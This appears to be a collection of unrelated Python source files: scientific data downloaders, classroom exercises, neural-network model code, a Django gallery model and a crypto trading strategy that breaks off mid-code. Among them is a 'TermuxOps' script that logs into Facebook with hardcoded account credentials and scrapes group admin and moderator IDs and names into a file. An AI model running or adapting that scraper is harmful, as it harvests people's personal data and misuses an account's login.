if not public:
username = uname
password = pword
p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, private_url, username, password)
handler = urllib.request.HTTPBasicAuthHandler(p)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener)
page = urllib.request.urlopen(private_url)
else:
page = urllib.request.urlopen(public_url)
return page.read().decode("utf-8")
def get_file_from_site(filename, public, data_dir):
import os
    import urllib.request
public_url = 'https://lasp.colorado.edu/maven/sdc/public/files/api/v1/search/science/fn_metadata/download' + '?file=' + filename
private_url = 'https://lasp.colorado.edu/maven/sdc/service/files/api/v1/search/science/fn_metadata/download' + '?file=' + filename
if not public:
username = uname
password = pword
p = urllib.request.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, private_url, username, password)
handler = urllib.request.HTTPBasicAuthHandler(p)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener)
page = urllib.request.urlopen(private_url)
else:
page = urllib.request.urlopen(public_url)
with open(os.path.join(data_dir, filename), "wb") as code:
code.write(page.read())
return
def get_orbit_files():
import os
    import urllib.request  # the request submodule must be imported explicitly in Python 3
import re
orbit_files_url = "http://naif.jpl.nasa.gov/pub/naif/MAVEN/kernels/spk/"
    pattern = r'maven_orb_rec(\.orb|.{17}\.orb)'  # raw string avoids the invalid-escape warning
page = urllib.request.urlopen(orbit_files_url)
page_string = str(page.read())
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
orbit_files_path = os.path.join(toolkit_path, "orbitfiles")
if not os.path.exists(orbit_files_path):
os.mkdir(orbit_files_path)
for matching_pattern in re.findall(pattern, page_string):
filename = "maven_orb_rec" + matching_pattern
o_file = urllib.request.urlopen(orbit_files_url + filename)
with open(os.path.join(orbit_files_path, filename), "wb") as code:
code.write(o_file.read())
merge_orbit_files()
return
def merge_orbit_files():
import os
import re
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
orbit_files_path = os.path.join(toolkit_path, "orbitfiles")
pattern = 'maven_orb_rec(_|)(|.{6})(|_.{9}).orb'
orb_dates = []
orb_files = []
for f in os.listdir(orbit_files_path):
x = re.match(pattern, f)
if x is not None:
orb_files.append(os.path.join(orbit_files_path, f))
if x.group(2) != '':
orb_dates.append(x.group(2))
else:
orb_dates.append('999999')
sorted_files = [x for (y, x) in sorted(zip(orb_dates, orb_files))]
with open(os.path.join(toolkit_path, 'maven_orb_rec.orb'), "w") as code:
skip_2_lines = False
for o_file in sorted_files:
with open(o_file) as f:
if skip_2_lines:
f.readline()
f.readline()
skip_2_lines = True
code.write(f.read())
return
def get_access():
import os
toolkit_path = os.path.dirname(__file__)
with open(os.path.join(toolkit_path, 'access.txt'), 'r') as f:
f.readline()
s = f.readline().rstrip()
s = s.split(' ')
if s[1] == '1':
return False
else:
return True
def get_root_data_dir():
import pyspedas
# Get preferred data download location for pyspedas project
prefs = pyspedas.get_spedas_prefs()
if 'data_dir' in prefs:
download_path = prefs['data_dir']
else:
raise NameError('data_dir is not found in spd_prefs.txt')
import os
# Get the "toolkit path" (where MAVEN download code is)
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
if not os.path.exists(os.path.join(toolkit_path, 'mvn_toolkit_prefs.txt')):
create_pref_file(toolkit_path, download_path)
with open(os.path.join(toolkit_path, 'mvn_toolkit_prefs.txt'), 'r') as f:
f.readline()
s = f.readline().rstrip()
# Get rid of first space
s = s.split(' ')
nothing = ' '
return nothing.join(s[1:])
def create_pref_file(toolkit_path, download_path):
import os
# Put data download path into preferences file
with open(os.path.join(toolkit_path, 'mvn_toolkit_prefs.txt'), 'w') as f:
f.write("'; IDL Toolkit Data Preferences File'\n")
f.write('mvn_root_data_dir: ' + download_path)
return
def set_new_data_root_dir():
import os
# Get new preferred data download location for pyspedas project
valid_path = input("Enter directory preference: ")
while not os.path.exists(valid_path):
valid_path = input("Specified path does not exist. Enter new path: ")
download_path = valid_path
print("root_data_dir set to " + download_path)
# Edit the pyspedas pref file to reflect the new data download location
pref_file = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'spd_prefs_txt.py'))
with open(pref_file, 'r') as f:
content = f.readlines()
content[3] = 'data_dir = \'{}\'\n'.format(download_path)
with open(pref_file, 'w') as f:
for line in content:
f.write(line)
# Also edit the mvn_toolkit_prefs file to reflect the new data download location
full_path = os.path.realpath(__file__)
toolkit_path = os.path.dirname(full_path)
create_pref_file(toolkit_path, download_path)
def get_new_files(files_on_site, data_dir, instrument, level):
import os
import re
fos = files_on_site
files_on_hd = []
for (dir, _, files) in os.walk(data_dir):
for f in files:
if re.match('mvn_' + instrument + '_' + level + '_*', f):
files_on_hd.append(f)
x = set(files_on_hd).intersection(files_on_site)
for matched_file in x:
fos.remove(matched_file)
return fos
def create_dir_if_needed(f, data_dir, level):
import os
if level == 'insitu':
year, month, _ = get_year_month_day_from_kp_file(f)
else:
year, month, _ = get_year_month_day_from_sci_file(f)
if not os.path.exists(os.path.join(data_dir, year, month)):
os.makedirs(os.path.join(data_dir, year, month))
full_path = os.path.join(data_dir, year, month)
return full_path
def get_year_month_day_from_kp_file(f):
date_string = f.split('_')[3]
year = date_string[0:4]
month = date_string[4:6]
day = date_string[6:8]
return year, month, day
def get_year_month_day_from_sci_file(f):
m = l2_regex.match(f)
year = m.group('year')
month = m.group('month')
day = m.group('day')
return year, month, day
def display_progress(x, y):
num_stars = int(round(float(x) / y * 70))
print("||" + "*" * num_stars + "-" * (70 - num_stars) + "||" + " ( " + str(round(100 * float(x) / y)) + "% )")
return
def get_uname_and_password():
global uname
global pword
import getpass
uname = input("Enter user name to access the team website: ")
pword = getpass.getpass("Enter your password: ")
return
|
py | 7df7c1e974bb0ec6d6c65ced693f2c41261c5922 | """
Demonstrates using OBJECTS via Turtle Graphics.
Concepts include:
-- CONSTRUCT an INSTANCE of a CLASS (we call such instances OBJECTS).
-- Make an object ** DO ** something by using a METHOD.
-- Reference an object's ** DATA ** by using an INSTANCE VARIABLE.
Also:
-- ASSIGNING a VALUE to a NAME (VARIABLE).
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Aaron Wilkin, their colleagues, and Ryo.
"""
###############################################################################
#
# DONE: 1.
# Yes, that means for YOU to DO things per the following instructions:
#
# On Line 13 above, replace PUT_YOUR_NAME_HERE with your OWN name.
#
# BTW, the top block of text above forms what is called a DOC-STRING.
# It documents what this module does, in a way that exterior programs
# can make sense of. It has no other effect on this program.
#
###############################################################################
import rosegraphics as rg
###############################################################################
#
# DONE: 2.
# Allow this module to use the rosegraphics.py module by marking the
# src
# folder in this project as a "Sources Root", as follows:
#
# In the Project window (to the left), right click on the src folder,
# then select Mark Directory As ~ Sources Root.
#
# You will see that rosegraphics in the import statement above (line 28)
# is no longer marked as an error. You will do this in all projects
# that use rosegraphics, so get used to it. :)
#
# Once rosegraphics in the import statement is no longer marked as error,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
###############################################################################
#
# TODO: 3.
# Run this module. A window will pop up and Turtles will move around.
# After the Turtles stop moving,
# ** click anywhere in the window to close the window **.
#
# Then look at the code below. Raise your hand when you have questions about
# what the code is doing. Be sure that you understand the notations for:
#
# -- CONSTRUCTING an instance of a CLASS, e.g.
# rg.SimpleTurtle()
#
# -- ASSIGNING the resulting OBJECT (instance of a class) a NAME, e.g.
# natasha = rg.SimpleTurtle()
#
# -- Applying a METHOD to an object to make the object DO something, e.g.
# natasha.forward(100)
#
# -- Accessing an INSTANCE VARIABLE of an object, e.g.
# natasha.speed = 10
# boris.speed = natasha.speed
#
# After you are confident that you understand all the code below,
# change this _TODO_ to DONE and ** continue to the next _TODO_ (below). **
#
###############################################################################
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make and initialize) a TurtleWindow object for animation.
# The definition of a TurtleWindow is in the rg
# (shorthand for rosegraphics) module.
# -----------------------------------------------------------------------------
window = rg.TurtleWindow()
window.delay(20) # Bigger numbers mean slower animation.
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - CONSTRUCT (make) a SimpleTurtle object and ASSIGN a NAME to the object.
# -----------------------------------------------------------------------------
boris = rg.SimpleTurtle()
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Ask the SimpleTurtle object to do things by applying METHODs to it.
# The numbers in the parentheses are called ARGUMENTS.
# -----------------------------------------------------------------------------
boris.forward(100)
boris.left(90)
boris.forward(200)
# -----------------------------------------------------------------------------
# The next few lines show how to:
# - Construct a second SimpleTurtle,
# set its pen and speed INSTANCE VARIABLES, and ask it to do things.
# -----------------------------------------------------------------------------
natasha = rg.SimpleTurtle('turtle')
natasha.pen = rg.Pen('red', 30) # Second argument is the Pen's thickness
natasha.speed = 5 # Bigger means faster, max is usually about 10
natasha.backward(50)
natasha.right(90)
natasha.forward(125)
natasha.speed = 1 # Now slower
natasha.go_to(rg.Point(-100, 200))
###############################################################################
#
# DONE: 4.
# Add a few more lines of your own code to make one of the existing
# SimpleTurtles move some more and/or have different characteristics.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
ryo = rg.SimpleTurtle()
ryo.pen = rg.Pen('blue', 60)
ryo.speed = 10
ryo.right(90)
ryo.backward(80)
ryo.left(45)
ryo.backward(90)
###############################################################################
#
# TODO: 5.
# The above code CONSTRUCTS two SimpleTurtle objects
# and gives those objects NAMES:
# boris natasha
#
# Add code of your own that constructs another SimpleTurtle object,
# naming it whatever you want. Names cannot have spaces or special
# characters, but they can have digits and underscores, e.g.
# this_1_has
#
# STYLE RULE: Your names should always begin with a LOWER_CASE letter.
# So mary is OK but Mary is NOT OK.
#
# Then add more code that:
# -- Constructs a Pen object,
# -- assigns your SimpleTurtle's pen to the constructed Pen object, and
# -- makes your SimpleTurtle move around a bit.
#
# ** Nothing fancy is required. **
# ** A SUBSEQUENT exercise will let you show your creativity. **
#
# As always, test by running the module.
#
###############################################################################
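# -----------------------------------------------------------------------------
# A minimal sketch for TODO 5 above (one possible answer, shown as an example;
# the turtle's name, pen color and movements below are illustrative choices).
# -----------------------------------------------------------------------------
third_turtle = rg.SimpleTurtle('turtle')
third_turtle.pen = rg.Pen('green', 10)
third_turtle.speed = 8
third_turtle.forward(150)
third_turtle.left(120)
third_turtle.forward(150)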
###############################################################################
#
# TODO: 6.
# Ensure that no blue bars on the scrollbar-thing to the right remain.
# Run one more time to be sure that all is still OK.
#
# Then COMMIT-and-PUSH your work as before:
# 1. Select VCS from the menu bar (above).
# 2. Choose Commit from the pull-down menu that appears.
# 3. In the Commit Changes window that pops up,
# press the Commit and Push button.
# (Note: If you see only a Commit button:
# - HOVER over the Commit button
# (in the lower-right corner of the window)
# - CLICK on Commit and Push.)
#
# You can COMMIT-and-PUSH as often as you like.
# DO IT FREQUENTLY; AT LEAST once per module.
#
###############################################################################
# -----------------------------------------------------------------------------
# The next line keeps the window open until the user clicks in the window.
# Throughout this exercise, this close_on_mouse_click line
# should be the LAST line in the file. DO NOT ADD CODE BELOW THIS LINE!
# -----------------------------------------------------------------------------
window.close_on_mouse_click()
|
py | 7df7c21d0312f19fd320da5f9a3063e188652399 | from number_theory import divisor_sums_to
def p21(number: int) -> int:
divisor_sums = divisor_sums_to(number)
amicable_sum = 0
for a in range(1, number):
b = divisor_sums[a]
if a == b or b >= number: continue
b_sum = divisor_sums[b]
if b_sum >= number: continue
if a == b_sum: amicable_sum += a
return amicable_sum
if __name__ == '__main__':
print(p21(301))
print(p21(10000))
|
py | 7df7c22955e3fb5faea24b1e181e162ecadc3897 | '''DLA in PyTorch.
Reference:
Deep Layer Aggregation. https://arxiv.org/abs/1707.06484
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..registry import register_model
__all__ = ['DLA']
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Root(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=1):
super(Root, self).__init__()
self.conv = nn.Conv2d(
in_channels, out_channels, kernel_size,
stride=1, padding=(kernel_size - 1) // 2, bias=False)
self.bn = nn.BatchNorm2d(out_channels)
def forward(self, xs):
x = torch.cat(xs, 1)
out = F.relu(self.bn(self.conv(x)))
return out
class Tree(nn.Module):
def __init__(self, block, in_channels, out_channels, level=1, stride=1):
super(Tree, self).__init__()
self.level = level
if level == 1:
self.root = Root(2*out_channels, out_channels)
self.left_node = block(in_channels, out_channels, stride=stride)
self.right_node = block(out_channels, out_channels, stride=1)
else:
self.root = Root((level+2)*out_channels, out_channels)
for i in reversed(range(1, level)):
subtree = Tree(block, in_channels, out_channels,
level=i, stride=stride)
self.__setattr__('level_%d' % i, subtree)
self.prev_root = block(in_channels, out_channels, stride=stride)
self.left_node = block(out_channels, out_channels, stride=1)
self.right_node = block(out_channels, out_channels, stride=1)
def forward(self, x):
xs = [self.prev_root(x)] if self.level > 1 else []
for i in reversed(range(1, self.level)):
level_i = self.__getattr__('level_%d' % i)
x = level_i(x)
xs.append(x)
x = self.left_node(x)
xs.append(x)
x = self.right_node(x)
xs.append(x)
out = self.root(xs)
return out
class DLA(nn.Module):
def __init__(self, block=BasicBlock, num_classes=10):
super(DLA, self).__init__()
self.base = nn.Sequential(
nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(16),
nn.ReLU(True)
)
self.layer1 = nn.Sequential(
nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(16),
nn.ReLU(True)
)
self.layer2 = nn.Sequential(
nn.Conv2d(16, 32, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(True)
)
self.layer3 = Tree(block, 32, 64, level=1, stride=1)
self.layer4 = Tree(block, 64, 128, level=2, stride=2)
self.layer5 = Tree(block, 128, 256, level=2, stride=2)
self.layer6 = Tree(block, 256, 512, level=1, stride=2)
self.linear = nn.Linear(512, num_classes)
def forward(self, x):
out = self.base(x)
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = self.layer5(out)
out = self.layer6(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
@register_model
def dla():
return DLA()
def test():
net = DLA()
print(net)
x = torch.randn(1, 3, 32, 32)
y = net(x)
print(y.size())
if __name__ == '__main__':
test()
|
py | 7df7c2d0580169f0f94607c90b6aab58c36cbbe8 | import unittest
from typing import Any, List
from hstest.check_result import CheckResult
from hstest.stage_test import StageTest
from hstest.test_case import TestCase
class TestImportPackage2(StageTest):
def generate(self) -> List[TestCase]:
return [TestCase()]
def check(self, reply: str, attach: Any) -> CheckResult:
return CheckResult(reply == '10\n', '')
@unittest.skip("Relative imports don't work")
class Test(unittest.TestCase):
def test(self):
status, feedback = TestImportPackage2('random_module.main').run_tests()
self.assertEqual("test OK", feedback)
if __name__ == '__main__':
Test().test()
|
py | 7df7c3eaf4a2b659ce134c226e5b048d8b4dba72 | import tensorflow as tf
from nets import resnet_v1
from preprocessing import vgg_preprocessing
from ..utils.upsampling import bilinear_upsample_weights
slim = tf.contrib.slim
# Mean values for VGG-16
from preprocessing.vgg_preprocessing import _R_MEAN, _G_MEAN, _B_MEAN
def extract_resnet_v1_101_mapping_without_logits(resnet_v1_101_variables_mapping):
"""Removes the logits variable mapping from resnet_v1_101_16s to resnet_v1_101 model mapping dict.
Given the resnet_v1_101_16s to resnet_v1_101 model mapping dict which is returned by
    resnet_v1_101_16s() function, remove the mapping for the logits variable. This is done because this
variable is responsible for final class prediction and is different for different
tasks. Last layer usually has different size, depending on the number of classes
to be predicted. This is why we omit it from the dict and those variables will
be randomly initialized later.
Parameters
----------
resnet_v1_101_variables_mapping : dict {string: variable}
Dict which maps the resnet_v1_101_16s model's variables to resnet_v1_101 checkpoint variables
names. Look at resnet_v1_101_16s() function for more details.
Returns
-------
updated_mapping : dict {string: variable}
Dict which maps the resnet_v1_101_16s model's variables to resnet_v1_101 checkpoint variables
names without logits layer mapping.
"""
# TODO: review this part one more time
resnet_v1_101_keys = resnet_v1_101_variables_mapping.keys()
resnet_v1_101_without_logits_keys = []
for key in resnet_v1_101_keys:
if 'logits' not in key:
resnet_v1_101_without_logits_keys.append(key)
updated_mapping = {key: resnet_v1_101_variables_mapping[key] for key in resnet_v1_101_without_logits_keys}
return updated_mapping
def resnet_v1_101_16s(image_batch_tensor,
number_of_classes,
is_training):
"""Returns the resnet_v1_101_16s model definition.
The function returns the model definition of a network that was described
in 'DeepLab: Semantic Image Segmentation with Deep Convolutional Nets,
Atrous Convolution, and Fully Connected CRFs' by Chen et al.
The network subsamples the input by a factor of 16 and uses the bilinear
upsampling kernel to upsample prediction by a factor of 16. This means that
if the image size is not of the factor 16, the prediction of different size
    will be delivered. To adapt the network for an input of any size, use
adapt_network_for_any_size_input(resnet_v1_101_16s, 16). Note: the upsampling kernel
is fixed in this model definition, because it didn't give significant
improvements according to aforementioned paper.
Parameters
----------
image_batch_tensor : [batch_size, height, width, depth] Tensor
Tensor specifying input image batch
number_of_classes : int
An argument specifying the number of classes to be predicted.
For example, for PASCAL VOC it is 21.
is_training : boolean
An argument specifying if the network is being evaluated or trained.
Returns
-------
upsampled_logits : [batch_size, height, width, number_of_classes] Tensor
Tensor with logits representing predictions for each class.
Be careful, the output can be of different size compared to input,
use adapt_network_for_any_size_input to adapt network for any input size.
    Otherwise, the input image sizes should be multiples of 16.
resnet_v1_101_16s_variables_mapping : dict {string: variable}
Dict which maps the resnet_v1_101_16s model's variables to resnet_v1_101 checkpoint variables
    names. We need this to initialize the weights of the resnet_v1_101_16s model with resnet_v1_101 from
checkpoint file. Look at ipython notebook for examples.
"""
with tf.variable_scope("resnet_v1_101_16s") as resnet_v1_101_16s:
upsample_factor = 16
# Convert image to float32 before subtracting the
# mean pixel value
image_batch_float = tf.to_float(image_batch_tensor)
# Subtract the mean pixel value from each pixel
mean_centered_image_batch = image_batch_float - [_R_MEAN, _G_MEAN, _B_MEAN]
upsample_filter_np = bilinear_upsample_weights(upsample_factor,
number_of_classes)
upsample_filter_tensor = tf.constant(upsample_filter_np)
# TODO: make pull request to get this custom vgg feature accepted
# to avoid using custom slim repo.
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
logits, end_points = resnet_v1.resnet_v1_101(mean_centered_image_batch,
number_of_classes,
is_training=is_training,
global_pool=False,
output_stride=16)
downsampled_logits_shape = tf.shape(logits)
        # Calculate the output size of the upsampled tensor
upsampled_logits_shape = tf.stack([
downsampled_logits_shape[0],
downsampled_logits_shape[1] * upsample_factor,
downsampled_logits_shape[2] * upsample_factor,
downsampled_logits_shape[3]
])
# Perform the upsampling
upsampled_logits = tf.nn.conv2d_transpose(logits,
upsample_filter_tensor,
output_shape=upsampled_logits_shape,
strides=[1, upsample_factor, upsample_factor, 1])
# Map the original vgg-16 variable names
# to the variables in our model. This is done
# to make it possible to use assign_from_checkpoint_fn()
# while providing this mapping.
# TODO: make it cleaner
resnet_v1_101_16s_variables_mapping = {}
resnet_v1_101_16s_variables = slim.get_variables(resnet_v1_101_16s)
for variable in resnet_v1_101_16s_variables:
# Here we remove the part of a name of the variable
# that is responsible for the current variable scope
original_resnet_v1_101_checkpoint_string = variable.name[len(resnet_v1_101_16s.original_name_scope):-2]
resnet_v1_101_16s_variables_mapping[original_resnet_v1_101_checkpoint_string] = variable
return upsampled_logits, resnet_v1_101_16s_variables_mapping
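# A minimal usage sketch, not part of the original module.
def example_build_graph():
    """Illustrative only. Assumptions: TF1-style graph mode, a local checkpoint
    named 'resnet_v1_101.ckpt', 21 classes (PASCAL VOC), and an input whose
    spatial dimensions are multiples of 16.
    """
    image_batch = tf.placeholder(tf.uint8, shape=(1, 384, 384, 3))
    logits, mapping = resnet_v1_101_16s(image_batch,
                                        number_of_classes=21,
                                        is_training=False)
    # Drop the logits mapping so the final layer is randomly initialized.
    mapping = extract_resnet_v1_101_mapping_without_logits(mapping)
    init_fn = slim.assign_from_checkpoint_fn('resnet_v1_101.ckpt', mapping)
    return logits, init_fn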
|
py | 7df7c4446c9f6f5bbf57443273c8724adf32f941 | from django.db import models
class Location(models.Model):
"""
Class that contains location details of the image posted
"""
name = models.CharField(max_length = 15)
description = models.TextField()
def __str__(self):
return self.name
def save_location(self):
self.save()
def del_location(self):
self.delete()
class Category(models.Model):
"""
Class that contains the category details of the image posted
"""
name = models.CharField(max_length = 15)
description = models.TextField()
def __str__(self):
return self.name
def save_cat(self):
self.save()
def del_cat(self):
self.delete()
class Image(models.Model):
"""
Class that contains details concerning the image itself
"""
photo = models.ImageField(upload_to = 'images/')
name = models.CharField(max_length = 25)
description = models.TextField()
    location = models.ForeignKey(Location, on_delete=models.CASCADE)
    category = models.ForeignKey(Category, on_delete=models.CASCADE)
# up_date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
def save_image(self):
self.save()
    def delete_image(self):
        self.delete()
# @classmethod
# def get_image_by_id(cls, id):
# image = Image.objects.get(id=id)
# return image
@classmethod
def get_image_by_id(cls, id):
image = Image.objects.get(id=id)
return image
@classmethod
def filter_by_location(cls, id):
image = Image.objects.filter(location_id=id).all()
return image
@classmethod
def get_images(cls):
images = Image.objects.all()
return images
@classmethod
def search_image(cls, category):
images = cls.objects.filter(category__name__icontains=category)
return images
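# A minimal usage sketch, not part of the original app: the location id and
# category string below are illustrative assumptions.
def example_gallery_queries():
    all_images = Image.get_images()
    location_images = Image.filter_by_location(1)
    travel_images = Image.search_image('travel')
    return all_images, location_images, travel_images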
|
py | 7df7c52021f41ab26319e80b3e5031347965ecf6 | '''
5. Write a program that reads 20 integers and stores them in a list. Store the even numbers in the list 'pares' and the
odd numbers in the list 'impares'. Print all three lists.
'''
numeros = list()
pares = list()
impares = list()
for i in range(20):
numeros.append(int(input(f'Num {i+1}: ')))
if numeros[i] % 2 == 0:
pares.append(numeros[i])
elif numeros[i] % 2 == 1:
impares.append(numeros[i])
print('\nNumbers read: ', end='')
print(*numeros)
print('Even numbers: ', end='')
print(*pares)
print('Odd numbers: ', end='')
print(*impares)
|
py | 7df7c660da850096e6151211c8113ea21ba9a140 | import requests
from bs4 import BeautifulSoup
from http.cookiejar import LWPCookieJar as kuki
import sys
import mechanize
import os
if sys.platform in ["linux","linux2"]:
G = "\033[32m"
R = "\033[31m"
Y = "\033[33m"
BB = "\033[1m"
B = "\033[0m"
U = "\033[35m"
cl = "clear"
rm = "rm -rf cookies.txt"
make = "touch cookies.txt"
else:
G = " "
R = " "
Y = " "
BB = " "
U = " "
B = " "
cl = "cls"
rm = "del cookies.txt"
make = "copy nul cookies.txt"
logo = f""" {G}TermuxOps Official{B}{R}{BB}
.'\ /`.
.'.-.`-'.-.`.
..._: .-. .-. :_...
.' '-.({G}o{R} ) ({G}o{R} ).-' `.
{R} : _ _ _`~(_)~`_ _ _ :
: /: ' .-=_ _=-. ` ;\ :
: :|-.._ ' ` _..-|: :
: `:| |`:-:-.-:-:'| |:' :
`. `.| | | | | | |.' .'
`. `-:_| | |_:-' .'
`-._ ```` _.-'
``-------''{G}
[ Created By : Hagir$ ]
{U} Get Admin & Moderator ID {B}
"""
s = requests.Session()
member = []
def show():
f = open("id.txt","a")
count = len(member)
print(f"{BB}Name Group : { title }{B}")
print("-"*50)
for x in member:
url = "https://mbasic.facebook.com/" + str(x)
uri = s.get(url).text
soup = BeautifulSoup(uri, "html.parser")
print(str(x) +" -> "+ soup.title.string.split("|")[0])
x = x + "\n"
f.write(x)
print("-"*50)
os.system(rm)
print(f"Count : {count}")
input("[ AGAIN ]")
os.system("clear")
menu(logo)
def get_id(param):
try:
url = "https://mbasic.facebook.com/" + param[0]
data = []
uri = s.get(url).text
soup = BeautifulSoup(uri, "html.parser")
for x in soup.find_all("table"):
data.append(x.get('id'))
for x in range(len(data)):
if "member" in str(data[x]):
member.append(data[x].split("_")[1])
show()
except:
show()
def process_3(param):
print(f"{G}{BB}[ * ] Success : Retrieve Admod ID{B}")
url = "https://mbasic.facebook.com/" + param[0]
uri = s.get(url).text
data = []
param = []
data2 = []
soup = BeautifulSoup(uri, "html.parser")
for x in soup.find_all("table"):
data.append(x.get('id'))
for x in range(len(data)):
if "member" in str(data[x]):
member.append(data[x].split("_")[1])
for x in soup.find_all("a"):
data2.append(x.get('href'))
for x in range(len(data2)):
if "/browse/" in str(data2[x]):
param.append(data2[x])
get_id(param)
def process_2(param):
print(f"{G}[ * ] Processing : View List Admin And Moderator{B}")
url = "https://mbasic.facebook.com/"+param[0]
data = []
param = []
uri = s.get(url).text
soup = BeautifulSoup(uri,"html.parser")
for x in soup.find_all("a"):
data.append(x.get('href'))
for x in range(len(data)):
if "list_admin_moderator" in str(data[x]):
param.append(data[x])
process_3(param)
def process_1(user,target):
global title
print(f"{G}[ * ] Processing : View Member Data{B}")
url = 'https://mbasic.facebook.com/groups/'+target +"/"
s.cookies = kuki('cookies.txt')
s.cookies.load()
uri = s.get(url).text
data = []
param = []
soup = BeautifulSoup(uri, "html.parser")
title = soup.title.string.split("|")[0]
for x in soup.find_all("a"):
data.append(x.get('href'))
for x in range(len(data)):
if "?view=members" in str(data[x]):
param.append(data[x])
process_2(param)
def login(user,pwd,target):
print(f"{G}[ * ] Logging in {B}")
cj = kuki('cookies.txt')
try:
data = []
br = mechanize.Browser()
br.set_cookiejar(cj)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/12.0.1987/37.7327; U; pl) Presto/2.12.423 Version/12.16')]
br.open('https://mbasic.facebook.com/login')
br._factory.is_html = True
br.select_form(nr = 0)
br.form['email'] = user
br.form['pass'] = pwd
sub = br.submit().read()
if "doesn't match" in str(sub):
print("\033[31m[ x ] Username Or Password Wrong\033[0m")
os.system(rm)
if "checkpoint" in str(sub):
print(R + "[ x ] Account Checkpoint" + B)
os.system(rm)
else:
os.system(make)
cj.save()
process_1(user,target)
except:
print(f"{R} [ ! ] Failed{B}")
input("[ AGAIN ]")
os.system("clear")
menu(logo)
def menu(banner=None):
print(banner)
target = str(input("[?] ID Group : "))
if len(target) < 1:
os.system("clear")
print(f"{R} Empty -_- {B}")
print(f"{BB} Type {G}Exit{B} to exit the program{B}")
menu(logo)
if target == "exit":
os.system("clear")
print(f"{R} Thanks You :) {B}")
exit(1)
note = str(input("Use a server account? (y/n)"))
if note == "y":
login("92349545712483","512483",target)
if note == "n":
print(f"{BB}[ * ] Login Facebook{B}")
usr = input(f"{U}[ ? ]{BB} Username : ")
pwd = input(f"{U}[ ? ]{BB} Password : ")
login(usr,pwd,target)
else:
os.system("clear")
print(f"{R} Command Not Found{B}")
menu(logo)
menu(logo)
|
py | 7df7c7f40ec2ed26e09aebf687d844cc5623a679 | # -*- coding:utf-8 -*-
"""
Fixed-quantity mode CTA master strategy demo
Project: alphahunter
Author: HJQuant
Description: Asynchronous driven quantitative trading framework
"""
import sys
import copy
import asyncio
from abc import ABCMeta, abstractmethod
from quant import const
from quant.state import State
from quant.utils import tools, logger
from quant.config import config
from quant.market import Market, Kline, Orderbook, Trade, Ticker
from quant.order import Order, Fill, ORDER_ACTION_BUY, ORDER_ACTION_SELL, ORDER_STATUS_FILLED, ORDER_TYPE_MARKET, ORDER_TYPE_IOC
from quant.position import Position
from quant.asset import Asset
from quant.tasks import LoopRunTask, SingleTask
from quant.trader import Trader
from quant.strategy import Strategy
from quant.utils.decorator import async_method_locker
from quant.interface.model_api import ModelAPI
from nr import RsiModel, CciModel, MaModel
class CTAController(Strategy):
    def __init__(self):
        """ Initialization
"""
super(CTAController, self).__init__()
        # The models managed by this master strategy
        self.models = [RsiModel(), CciModel(), MaModel()]
        # The models care about 'BTC', so the master strategy tracks it as well
self.coins = ['BTC']
        # Initial asset snapshot
        self.init_assets = None
        # Current position
        self.current_position = {
            'BTC': 0
        }
        # Target position
        self.target_position = {
            'BTC': 0
        }
        # Delta position: how far the current position is from the target, i.e. the amount to rebalance
        self.delta_position = {
            'BTC': 0
        }
        # Whether the strategy should stop
self.is_stop = False
    def model_consolidation(self):
        """ Combine the models' signals into the master strategy's target position
"""
is_stop = True
        # Aggregate the total target position across all models.
        # Reset the totals once, before the model loop, so each model's
        # contribution is accumulated rather than overwritten.
        for coin in self.coins:
            self.target_position[coin] = 0
        for model in self.models:
            for coin in self.coins:
                self.target_position[coin] += model.target_position[coin]
            # The strategy stops only after every model has stopped; if any model is still running, keep going
            if model.running_status == 'running':
                is_stop = False
        self.is_stop = is_stop
        # Compute how far the current position is from the target, i.e. the rebalancing amount
for coin in self.coins:
self.delta_position[coin] = self.target_position[coin] - self.current_position[coin]
    async def on_time(self):
        """ Executed every 5 seconds
"""
        # Loop over the models to pull their latest signals
        for model in self.models:
            await model.on_time()
        # Consolidate the models and refresh the target position
        self.model_consolidation()
        # Place orders based on the delta position
        await self.submit_orders(self.delta_position)
    async def on_kline_update_callback(self, kline: Kline):
